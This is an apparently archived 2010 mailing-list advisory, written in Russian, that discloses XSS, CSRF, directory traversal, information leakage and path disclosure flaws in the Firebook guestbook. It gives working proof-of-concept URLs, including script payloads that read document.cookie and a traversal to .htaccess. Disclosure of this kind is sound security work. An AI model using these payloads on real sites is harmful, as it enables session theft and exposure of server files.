Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit

[SECURITY] [DSA 2060-1] New cacti packages fix SQL injection

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	17.06.2010
Subject:	Vulnerabilities in Firebook

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Information Leakage, Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal и Full path disclosure уязвимостях в
Firebook.

Information Leakage:

http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;

CSRF:

http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;

Возможны CSRF-атаки на другие сайты.

XSS:

http:
//site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/guestbook/index.html?answer=guestbook/guest/file.
html;page=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Directory Traversal:

http://site/path_to_firebook_admin/?param=1;show=../.htaccess;

http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.
html

Full path disclosure:

http://site/path_to_firebook_admin/?param=1;show=param.txt;

http://site/guestbook/index.html?answer=guestbook/guest/1

Уязвимы все версии Firebook.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4124/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua